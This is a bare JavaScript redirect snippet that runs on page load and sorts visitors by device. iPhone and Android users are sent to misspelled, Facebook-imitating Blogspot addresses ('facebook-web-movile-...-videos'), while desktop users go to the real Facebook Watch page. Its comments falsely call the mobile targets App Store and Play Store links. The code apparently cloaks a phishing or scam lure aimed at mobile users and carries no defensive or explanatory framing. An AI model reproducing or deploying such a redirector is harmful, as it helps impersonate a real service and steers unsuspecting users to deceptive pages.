<script type="text/javascript"> var device = navigator.userAgent
 
if (device.match(/Iphone/i)|| device.match(/Ipod/i)|| device.match(/iPhone|iPad|iPod/i))
 	{ 
		window.location = "https://facebook-web-movile-iphone-videos.blogspot.com/"; //URL del APP Store
	}
else { 
	if (device.match(/Android/i))		
	{ 	
		window.location = "https://facebook-web-movile-android-videos.blogspot.com/"; //URL del Play Store
	}
	else
	{ 
		window.location = "https://www.facebook.com/watch"; //En el caso que el cliente este visitando desde un computador, lo enviamos a la web. 
	}
}

</script>